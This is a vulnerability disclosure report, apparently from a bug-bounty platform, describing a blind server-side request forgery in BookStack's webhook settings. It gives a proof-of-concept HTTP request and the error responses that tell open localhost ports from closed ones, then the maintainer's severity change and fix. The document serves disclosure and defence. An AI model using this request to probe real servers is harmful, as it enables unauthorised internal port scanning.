Server Side Request Forgery (SSRF) in bookstackapp/bookstack

Valid

Reported on

Jul 27th 2023


Description

It is possible to access the local environment in the Webhook function.
Therefore, Blind SSRF makes it possible to perform a port scan against the local environment.

Proof of Concept

After logging in, access the webhook setting page, specify the URL with the following pattern, and check that you can access the local environment from the message difference.

Payload

Open Port

http://localhost:80

Closed Port

http://localhost:1234

Request

POST /settings/webhooks/create HTTP/2
Host: demo.bookstackapp.com
 ...

_token=6AoIWKtSMXumoIqe2YyXsDREcraLVqwaIjf8VEV0&active=true&name=a&endpoint=http%3A%2F%2Flocalhost%3A1234%2F&timeout=20&events%5B%5D=all

Response Result (Error Message)

Open Port

 Response status from endpoint was 405 

Closed Port

cURL error 7: Failed to connect to localhost port 1234 after 0 ms: Connection refused (see https://curl.haxx.se/libcurl/c/libcurl-errors.html) for http://localhost:1234/

PoC Video

https://drive.google.com/file/d/1SM3HwCulnW_09L8FYo6V4wWc4tx95rYC/view?usp=drive_link

Impact

It is possible to perform a port scan against the host's local environment.
Also, sensitive information in the local environment may be obtained.

We are processing your report and will contact the bookstackapp/bookstack team within 24 hours. 7 months ago
bookstackapp/bookstack maintainer modified the Severity from Medium (5.3) to Low (2.4) 7 months ago
bookstackapp/bookstack maintainer
7 months ago

Thanks @scgajge12 for reporting. I updated the severity since this requires admin user access and user interaction to exploit.

I wouldn't want to reduce error messages or prevent local access in general, since the errors are meant to be actual and detailed, and there are legitimate local use-cases.

I'll probably instead add some level of SSR_HOST_ALLOWLIST option so a system admin can limit where all BookStack server-side-requests can be sent to.

This is pretty low-risk/low severity in my view so not something I'd rush a bug-fix for, but will more likely be something I target for the next feature releases (1-2 month release cycle).

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
bookstackapp/bookstack maintainer validated this vulnerability 7 months ago
scgajge12 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
bookstackapp/bookstack maintainer marked this as fixed in v23.08 with commit c324ad 6 months ago
The fix bounty has been dropped
This vulnerability has now been published 6 months ago
to join this conversation